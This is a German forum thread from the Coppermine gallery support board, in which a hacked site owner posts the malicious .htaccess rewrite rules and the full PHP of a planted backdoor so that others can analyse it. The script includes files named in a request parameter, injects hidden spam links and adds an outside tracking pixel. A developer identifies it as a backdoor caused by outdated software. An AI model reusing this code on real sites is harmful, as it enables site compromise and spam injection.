Advanced search  

News:

cpg1.5.48 Security release - upgrade mandatory!
The Coppermine development team is releasing a security update for Coppermine in order to counter a recently discovered vulnerability. It is important that all users who run version cpg1.5.46 or older update to this latest version as soon as possible.
[more]

Pages: [1]   Go Down

Author Topic: gehackt?  (Read 6429 times)

0 Members and 1 Guest are viewing this topic.

kaiwahn

  • Coppermine newbie
  • Offline Offline
  • Posts: 17
gehackt?
« on: March 09, 2009, 09:50:37 pm »

hallo Freunde

folgendes ist heute passiert, meine htaccess wurde von außen umgeschrieben, darauf hin hab ich mein Passwort geändert und die Datei wieder umgeschrieben, ca. eine halbe Stunde später wieder wurde diese Datei geändert.
Änderung:
RewriteEngine On
RewriteCond /customers/fotofreunde-oberhausen.de/fotofreunde-oberhausen.de/httpd.www/galerie/incladd.php -f RewriteCond %{REQUEST_URI} !incladd.php$ RewriteCond %{REQUEST_URI} !ebf0a660.php$ RewriteRule ^.*\.(php[s345]?|[ps]?html?).*$ /galerie/incladd.php?file=%{SCRIPT_FILENAME}&%{QUERY_STRING} [NC,L] DirectoryIndex portal.php index.php

die beiden Dateien auf denen verwiesen wird, beinhalten folgenden Code:

<?php
error_reporting(0);

  if ( !function_exists('file_put_contents') && !defined('FILE_APPEND') ) {

   define('FILE_APPEND', 1);
   function file_put_contents($n, $d, $flag = false) {
       $mode = ($flag == FILE_APPEND || strtoupper($flag) == 'FILE_APPEND') ? 'a' : 'w';
       $f = @fopen($n, $mode);
       if ($f === false) {
           return 0;
       } else {
           if (is_array($d)) $d = implode($d);
           $bytes_written = fwrite($f, $d);
           fclose($f);
           return $bytes_written;
       }
   }
   


   }


if (!function_exists('file_get_contents')) {
      function file_get_contents($filename, $incpath = false, $resource_context = null)
      {
          if (false === $fh = fopen($filename, 'rb', $incpath)) {
              trigger_error('file_get_contents() failed to open stream: No such file or directory', E_USER_WARNING);
              return false;
          }
 
          clearstatcache();
          if ($fsize = @filesize($filename)) {
              $data = fread($fh, $fsize);
          } else {
              $data = '';
              while (!feof($fh)) {
                  $data .= fread($fh, 8192);
              }
          }
 
          fclose($fh);
          return $data;
      }
  }


   

function get_links_array() {
$links_array = array();

if (false === $f = @fopen('list.html', 'r')) return $links_array;

$fsize = filesize('list.html');
$request_uri = $_SERVER['REQUEST_URI'];
$seed_number = 0;
$request_uri_hash = md5($request_uri);
for ($i = 0; $i < strlen($request_uri_hash); $i++) { $seed_number += ord($request_uri_hash[$i]); } srand($seed_number); for ($i = 0; $i < 200; $i++) { fseek($f, rand(0, $fsize-200)); $tmp_line = trim(fgets($f)); if (!($line = trim(fgets($f)))) { $line = $tmp_line; }; @list($url, $title) = explode('|', $line); $links_array[] = '<a href="'.$url.'" title="'.$title.'">'.$title.'</a>';
}
fclose($f);
return $links_array;
};


function go_linkator($buffer) {
    global $links_array;
    $text_to_insert = "\n<div id='mlk' class='menu' style='position:absolute;top:-10000px;left:-10000px;'>".implode("\n<br>\n", $links_array)."</div>";   
    return (preg_replace("/(<body[^>]*>)/i", "\\1".$text_to_insert."<img height=\"1\" width=\"1\" alt=\"\" src=\"http://e1.extreme-dm.com/s10.g?login=nahuibly&j=n&jv=n\" />\n", $buffer));
   
};
//print "<!--  -->";
ob_start("go_linkator");
$links_array = get_links_array();

if (isset($_GET['file']))
{
    $incfile = $_GET['file'];
}
else
{
    $incfile = $_SERVER["REDIRECT_QUERY_STRING"];
    $incfile = preg_replace("/^[^\/]+/i", "", $incfile);
    $incfile = preg_replace("/^([^&]+)&.*/i", "\\1", $incfile); } chdir(dirname($incfile)); $file = basename($incfile); include($file); //print "<!--  -->";

ob_end_flush();

?>


und



<?php
/*************************
  Coppermine Photo Gallery
  ************************
  Copyright (c) 2003-2008 Dev Team
  v1.1 originally written by Gregory DEMAR

  This program is free software; you can redistribute it and/or modify
  it under the terms of the GNU General Public License version 3
  as published by the Free Software Foundation.
 
  ********************************************
  Coppermine version: 1.4.19
  $HeadURL: https://coppermine.svn.sourceforge.net/svnroot/coppermine/trunk/cpg1.4.x/logs/log_header.inc.php $
  $Revision: 4392 $
  $Author: gaugau $
  $Date: 2008-04-16 09:25:35 +0200 (Mi, 16 Apr 2008) $ **********************************************/

if (!defined('IN_COPPERMINE')) {
        die();
}
?>
Garbage collection deleted ./albums/edit/preview_cf2a1039.jpg at March 9, 2009, 8:19 pm Garbage collection deleted ./albums/edit/mHTTP_temp_6d3d8d1c.jpg at March 9, 2009, 8:19 pm



hat da jemand eine Idee was dieses erreichen soll, werd nicht schlau daraus

Dank im Voraus

Kai
Logged

Joachim Müller

  • Dev Team member
  • Coppermine addict
  • ****
  • Offline Offline
  • Gender: Male
  • Posts: 47843
  • aka "GauGau"
    • gaugau.de
Re: gehackt?
« Reply #1 on: March 10, 2009, 09:32:15 am »

Du wurdest in der Tat gehackt. Der Code dient zum Einschleusen von beliebigem weiteren Code. Es ist sozusagen der universelle Nachschlüssel für Deine Seite.
Grund für den Hack ist die Tatsache, dass Du offensichtlich cpg1.4.19 einsetzt, obwohl wir derzeit bei cpg1.4.21 sind und alle Versionen vor dieser Version bekannte Sicherheitslücken aufweisen, auf die wir nachdrücklich hingewiesen haben.
Lies http://forum.coppermine-gallery.net/index.php/topic,51927.0.html für die weitere Vorgehensweise.
Logged

Samson1964

  • Coppermine newbie
  • Offline Offline
  • Posts: 2
Re: gehackt?
« Reply #2 on: June 04, 2009, 12:57:38 pm »

Meine Galerie (Version 1.4.18) wurde auch mal gehackt. Ich dachte, ich hätte alles entfernt, es wurde aber immer noch ein personalisierter Header eingefügt. Nach "extreme-dm" (was in der fertigen Seite steht) usw. suchte ich in den SQL-Sicherungen und in den Skripten vergeblich. Erst der Hinweis hier auf die .htaccess hat mich auf die Spur gebracht. Danke!   
Logged
Pages: [1]   Go Up
 

Page created in 0.021 seconds with 20 queries.